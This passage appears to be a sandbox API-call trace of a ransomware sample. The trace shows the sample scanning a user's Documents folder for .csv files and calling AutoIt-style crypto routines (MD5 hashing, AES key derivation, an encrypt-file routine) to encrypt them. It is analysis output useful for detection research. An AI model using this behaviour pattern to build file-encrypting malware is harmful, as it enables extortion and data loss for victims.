dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZMBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bxf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xf\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0 o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nR9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rc3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2DHH4.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.192] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.192] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0177.192] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0177.192] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0177.192] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.192] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.193] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.193] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.193] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.193] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76dfe470, ftCreationTime.dwHighDateTime=0x1d5dae8, ftLastAccessTime.dwLowDateTime=0x7a81de0, ftLastAccessTime.dwHighDateTime=0x1d5db81, ftLastWriteTime.dwLowDateTime=0x7a81de0, ftLastWriteTime.dwHighDateTime=0x1d5db81, nFileSizeHigh=0x0, nFileSizeLow=0xd24a, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="-V0 o3_nR9rc3_2DHH4.csv", cAlternateFileName="-V0O3_~1.CSV")) returned 0x90ae18 [0177.197] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0177.197] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.197] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0177.197] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.197] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.197] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0177.197] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.197] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0177.197] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.197] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.198] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0177.198] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.198] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.198] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.198] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.198] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.198] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0177.198] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.198] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0177.199] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.199] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.199] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0177.199] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.199] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.200] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.200] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.200] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.200] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0177.200] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.200] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.200] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.200] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.200] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.200] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.200] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0177.200] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.200] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.200] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0177.200] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.200] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.200] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0177.200] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.200] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.200] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0177.201] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.201] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.201] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.201] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.201] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.201] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0177.201] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.201] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.201] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0177.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.201] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0177.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.201] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.202] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.202] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.202] CryptHashData (hHash=0x90af58, pbData=0x8ded80, dwDataLen=0x19, dwFlags=0x1) returned 1 [0177.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.202] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.202] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.202] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0177.202] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.202] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.202] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0177.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 